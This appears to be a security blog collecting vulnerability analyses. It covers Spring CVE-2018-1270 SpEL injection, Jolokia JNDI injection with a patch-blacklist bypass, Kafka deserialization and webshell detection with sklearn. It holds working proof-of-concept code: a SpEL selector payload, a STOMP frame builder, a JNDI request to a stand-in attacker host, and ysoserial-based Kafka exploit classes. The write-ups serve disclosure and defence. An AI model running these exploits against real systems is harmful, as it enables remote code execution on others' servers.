Articles published by 0c0c0f

CVE-2018-1270 Remote Code Execution with spring-messaging

Affected versions

  • Spring Framework 5.0 to 5.0.4
  • Spring Framework 4.3 to 4.3.14

Vulnerability analysis

The Spring Framework talks to a STOMP broker through the spring-messaging module. From the vulnerability description, the flaw lies in either the spring-messaging module or the stomp-websocket module, so let's analyze each in turn:

The spring-websockets module

It contains a sensitive-looking method:

@Nullable
public String[] decode(String content) throws IOException {
    return (String[]) this.objectMapper.readValue(content, String[].class);
}

Deserialization here uses the Jackson component, but autotype is not enabled and the code pins the deserialization target to String[].class. Attempting JNDI injection through this path only raises an exception and does not succeed.

625fbd72201477f4d64f9b4a2e79a5a1.png

Analyzing the spring-messaging module

The addSubscriptionInternal method of the DefaultSubscriptionRegistry class contains expression = this.expressionParser.parseExpression(selector) (a dangerous SpEL expression parse).
From the context we can tentatively conclude that the selector parameter is attacker-controlled. As anyone familiar with SpEL injection knows, however, code execution also requires a call to expression.getValue() or expression.setValue(). Reading on, lines 154-164 of the same file do call getValue on the expression object.

Reproducing the trigger flow of the vulnerability:

Click the Connect button and capture the request

52b29eca6c5ea5429201c48c8ad96bee.png

Modify the request and insert the following field:

\nselector:new java.lang.ProcessBuilder("/Applications/Calculator.app/Contents/MacOS/Calculator").start()
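The injected header rides on the STOMP SUBSCRIBE frame sent over the WebSocket. A minimal sketch of how such a frame could be assembled (the destination and subscription id values are illustrative placeholders, not taken from the original capture):

```python
# Sketch: building a STOMP SUBSCRIBE frame that smuggles a "selector"
# header. DefaultSubscriptionRegistry passes this header's value to
# expressionParser.parseExpression(selector), which later reaches getValue().
def build_subscribe_frame(destination, sub_id, selector):
    headers = {
        "id": sub_id,
        "destination": destination,
        "selector": selector,  # the SpEL payload goes here
    }
    lines = ["SUBSCRIBE"] + [f"{k}:{v}" for k, v in headers.items()]
    # A STOMP frame body is separated by a blank line and ends with a NUL byte
    return "\n".join(lines) + "\n\n\x00"

payload = ('new java.lang.ProcessBuilder('
           '"/Applications/Calculator.app/Contents/MacOS/Calculator").start()')
frame = build_subscribe_frame("/topic/greetings", "sub-0", payload)
```

Sending this frame registers the subscription; the expression is evaluated later, when a message is routed to the subscriber.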

43ec3a11b117e9b86582d16d1922fc13.png

Return to the chat window and send any message to trigger the malicious code

c25b1fe4957ce9fcd465d867e1d010df.png

9d57f7cb1ad30ab1e747922601163798.png

586b85fa87889b1950535a76e5c25553.png

Remediation

  • 5.0.x users should upgrade to 5.0.5
  • 4.3.x users should upgrade to 4.3.15

Vulnerability 2: XSS in the gs-messaging-stomp-websocket demo

2f1a64a5f7f2e688198fc8ffe5d805eb.png

Patch:https://github.com/spring-guides/gs-messaging-stomp-websocket/commit/6d68143e04ea1482b724c3f620688ec428089bc0

From:https://pivotal.io/security/cve-2018-1270

Jolokia JNDI Injection & XXE Vulnerability: Analysis and Reproduction

0x01 JNDI Injection CVE-2018-1000130

1.1 What is JNDI injection

Reference: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

1.2 Reproducing the vulnerability

Jolokia's JNDI injection issue lies in the jsr160 module, and the injection point is easy to find from the official documentation:

6.6. Proxy requests

For proxy requests, POST must be used as HTTP method so that the given JSON request can contain an extra section for the target which should be finally reached via this proxy request. A typical proxy request looks like

{
    "type" : "read",
    "mbean" : "java.lang:type=Memory",
    "attribute" : "HeapMemoryUsage",
    "target" : {
         "url" : "service:jmx:rmi:///jndi/rmi://targethost:9999/jmxrmi",
         "user" : "jolokia",
         "password" : "s!cr!t"
    }
  }
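To turn the proxy feature into a JNDI injection, the target url can point at an attacker-controlled RMI registry instead of a legitimate JMX endpoint. A minimal sketch of such a request body (the attacker host and object name are hypothetical placeholders):

```python
import json

# Sketch: a malicious Jolokia proxy request. The JSR-160 service URL makes
# the proxy agent perform a JNDI lookup against an attacker-controlled RMI
# registry (attacker.example.com is a placeholder).
malicious_request = {
    "type": "read",
    "mbean": "java.lang:type=Memory",
    "attribute": "HeapMemoryUsage",
    "target": {
        "url": "service:jmx:rmi:///jndi/rmi://attacker.example.com:1099/Object",
    },
}
body = json.dumps(malicious_request)
# POSTing this body to the agent's /jolokia endpoint triggers the lookup
```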

The patch information makes it easy to pinpoint the vulnerable location:

url within the target section is a JSR-160 service URL for the target
server reachable from within the proxy agent. user and password are
optional credentials used for the JSR-160 communication.

1.png

1.3 Exploitation

2.png

3.png

4.png

1.4 Impact

5.png

1.5 Patch bypass

From the patch, we can see that a blacklist entry was added for LDAP: service:jmx:rmi:///jndi/ldap:.*

https://github.com/rhuss/jolokia/commit/2f180cd0774b66d6605b85c54b0eb3974e16f034

6.png

However, JNDI injection supports three protocols: LDAP, RMI, and CORBA. So even after the patch, the problem remains.
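The gap is easy to demonstrate: a blacklist keyed only on the ldap: scheme says nothing about rmi: service URLs. A quick check against the patch's pattern (the pattern string is taken from the commit above; the URLs are illustrative):

```python
import re

# Blacklist pattern added by the Jolokia patch
blacklist = re.compile(r"service:jmx:rmi:///jndi/ldap:.*")

ldap_url = "service:jmx:rmi:///jndi/ldap://attacker.example.com:389/Object"
rmi_url = "service:jmx:rmi:///jndi/rmi://attacker.example.com:1099/Object"

blocked = bool(blacklist.match(ldap_url))   # ldap: is filtered
bypassed = not blacklist.match(rmi_url)     # rmi: slips through the filter
```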

7.png

8.png

0x02 XXE Vulnerability In PolicyDescriptor Class

2.1 Reproducing the vulnerability

9.png

10.png

11.png

12.png

2.2 Exploitation

Since I am not familiar with Jolokia, I have not yet found a user-controllable input point for this one.


Detecting webshells with sklearn

Environment setup

Windows

  • Install the Anaconda IDE

Besides Python itself, Anaconda bundles scientific computing packages such as numpy, scipy, and matplotlib, as well as network-related packages like beautiful-soup, requests, and lxml. After installing Anaconda, there is little need to painstakingly install other third-party libraries.

Mac installation

Webshell detection

NeoPI can compute a file's information entropy, longest word, index of coincidence, signature matches, and compression ratio. My feeling is that these features should work better than simply tokenizing with 1-grams and 2-grams.

  1. Entropy: measures a file's uncertainty over its ASCII byte values.
  2. Longest Word: an unusually long string may be encoded or obfuscated.
  3. Index of Coincidence: a low index suggests the code is potentially encrypted or obfuscated.
  4. Signature: searches the file for known malicious code snippets.
  5. Compression: compares the file's compression ratio.
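As an illustration of the first feature, Shannon entropy over a file's bytes can be computed in a few lines (a sketch, not NeoPI's exact implementation):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte; encoded/encrypted data trends toward 8."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# A repetitive string scores 0; uniformly distributed bytes score 8
low = shannon_entropy(b"aaaaaaaaaaaaaaaa")    # -> 0.0
high = shannon_entropy(bytes(range(256)))     # -> 8.0
```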

Malicious samples

tennc ysrc tdifg tanjiti

Benign samples

Wordpress joomla

Vectorizing the samples

python neopi.py --csv=joomla.csv -a -A /Users/0c0c0f/soft/threathunter/joomla-cms

Test code

import numpy as np
from sklearn import tree
from sklearn import linear_model
from sklearn.naive_bayes import GaussianNB
from sklearn import svm
from sklearn import neighbors

def loubao_desc(algorithm, y_pred):
    # All test samples are malicious, so every 0.0 (benign) prediction
    # is a miss: this prints the false-negative rate.
    num = 0
    total = 0
    for p in y_pred:
        if p == 0.0:
            num = num + 1
        total = total + 1
    print(algorithm, "false-negative rate:", num / total)

def wubao_desc(algorithm, y_pred):
    # All test samples are benign, so every 1.0 (malicious) prediction
    # is a false alarm: this prints the false-positive rate.
    num = 0
    total = 0
    for p in y_pred:
        if p == 1.0:
            num = num + 1
        total = total + 1
    print(algorithm, "false-positive rate:", num / total)

training = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/traning.csv"
testing_black = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/tdifg.csv"
testing_white = "/Users/0c0c0f/soft/threathunter/thwebshellldetect/joomla.csv"

training_data = np.loadtxt(open(training, "r"), delimiter=",")
debug = 1
if debug == 0:
    testing_data = np.loadtxt(open(testing_black, "r"), delimiter=",")
else:
    testing_data = np.loadtxt(open(testing_white, "r"), delimiter=",")
X = training_data[:, 0:4]
y = training_data[:, 5]

X1 = testing_data[:, 0:4]

# Naive Bayes
gnb = GaussianNB()
y_pred = gnb.fit(X, y).predict(X1)
if debug == 0:
    loubao_desc('Naive Bayes', y_pred)
else:
    wubao_desc('Naive Bayes', y_pred)

# Decision tree
dtc = tree.DecisionTreeClassifier()
y_pred = dtc.fit(X, y).predict(X1)
if debug == 0:
    loubao_desc('Decision tree', y_pred)
else:
    wubao_desc('Decision tree', y_pred)

# Logistic regression
lr = linear_model.LogisticRegression()
y_pred = lr.fit(X, y).predict(X1)
if debug == 0:
    loubao_desc('Logistic regression', y_pred)
else:
    wubao_desc('Logistic regression', y_pred)

# Support vector machine
svc = svm.SVC()
y_pred = svc.fit(X, y).predict(X1)
if debug == 0:
    loubao_desc('SVM', y_pred)
else:
    wubao_desc('SVM', y_pred)

# k-nearest neighbors
knc = neighbors.KNeighborsClassifier()
y_pred = knc.fit(X, y).predict(X1)
if debug == 0:
    loubao_desc('k-NN', y_pred)
else:
    wubao_desc('k-NN', y_pred)

Test results

  • Naive Bayes false-negative rate: 0.4879032258064516
  • Decision tree false-negative rate: 0.0
  • Logistic regression false-negative rate: 0.0
  • SVM false-negative rate: 0.04838709677419355
  • k-NN false-negative rate: 0.020161290322580645
  • Naive Bayes false-positive rate: 0.004206393718452047
  • Decision tree false-positive rate: 0.2501402131239484
  • Logistic regression false-positive rate: 0.0
  • SVM false-positive rate: 0.26472237801458215
  • k-NN false-positive rate: 0.2526640493550196

Logistic regression performs best for webshell detection.


Apache Kafka Deserialization Vulnerability

The author published the PoC directly in the report: CVE-IDs request for Apache Kafka desrialization vulnerability via runtime

import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public void test_Kafka_Deser() throws Exception {
    StandaloneConfig config;

    String projectDir = System.getProperty("user.dir");

    Jdk7u21 jdk7u21 = new Jdk7u21();
    Object o = jdk7u21.getObject("touch vul");

    byte[] ser = serialize(o);

    File tempFile = new File(projectDir + "/payload.ser");
    FileUtils.writeByteArrayToFile(tempFile, ser);

    Map<String, String> props = new HashMap<String, String>();
    props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
    props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
    props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
    props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
    props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
    config = new StandaloneConfig(props);

    FileOffsetBackingStore restore = new FileOffsetBackingStore();
    restore.configure(config);
    restore.start();
}

private byte[] serialize(Object object) throws IOException {
    ByteArrayOutputStream bout = new ByteArrayOutputStream();
    ObjectOutputStream out = new ObjectOutputStream(bout);
    out.writeObject(object);
    out.flush();
    return bout.toByteArray();
}

I asked some developers, who said this class does not appear in their code. Still, this deserialization entry point should be usable to bypass some blacklists, much like the MarshalledObject class is used to bypass WebLogic's.

A global search shows the same vulnerable pattern in test cases in the source tree. I do not know whether this class has other usage scenarios; feel free to reach out and discuss.

FileOffsetBackingStore.png

Setting up an environment to test it:

package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public class KafkaExploitTest {
    public static void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");
        CommonsCollections4 cc4 = new CommonsCollections4();
        Object o = cc4.getObject("calc");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception{
        KafkaExploitTest.test_Kafka_Deser();
    }
}

Add the following dependencies to pom.xml:

<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>connect-runtime</artifactId>
    <version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>connect-json</artifactId>
    <version>0.11.0.0</version>
    <scope>test</scope>
</dependency>

calc.png

Vulnerable demo code:

   @Test
   public void testSaveRestore() throws Exception {
       Callback<Void> setCallback = expectSuccessfulSetCallback();
       Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
       PowerMock.replayAll();

       store.set(firstSet, setCallback).get();
       store.stop();

       // Restore into a new store to ensure correct reload from scratch
       FileOffsetBackingStore restore = new FileOffsetBackingStore();
       restore.configure(config);
       restore.start();
       Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
       assertEquals(buffer("value"), values.get(buffer("key")));

       PowerMock.verifyAll();
   }

Business systems mostly serialize with Avro or JSON. If JDK native serialization is used instead, this function is the likely deserialization entry point.

A low-false-negative method for detecting Java deserialization vulnerabilities

1. It does not require a vulnerable third-party library on the target: the JDK's own URL class is used to issue a DNS request, and DNS traffic can usually leave the network, so false negatives should be very low.

2. Tooling: break-fast-serial; you need to modify it yourself to add the URLDNS payload, then start dnschef.

dnschef1.png

3. DNS resolution setup

dns1.png

4. Testing

url2.png

result1.png

5. Once a deserialization point is detected, work on a concrete bypass for that specific target.
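Complementary to the DNS-based probe, raw Java serialization is easy to spot on the wire: every stream starts with the magic bytes 0xACED followed by version 0x0005 (base64-encoded streams start with "rO0A"). A minimal sketch of such a traffic check (a heuristic, not part of break-fast-serial):

```python
import base64

JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC + STREAM_VERSION

def looks_like_java_serialization(blob: bytes) -> bool:
    """Detect raw or base64-encoded Java serialization streams."""
    if blob.startswith(JAVA_SER_MAGIC):
        return True
    # base64 of \xac\xed\x00 is "rO0A"; verify by decoding a prefix
    if blob.startswith(b"rO0A"):
        try:
            return base64.b64decode(blob[:8]).startswith(JAVA_SER_MAGIC[:3])
        except Exception:
            return False
    return False
```

Flagging requests that carry this signature narrows down which endpoints are worth probing with the URLDNS payload.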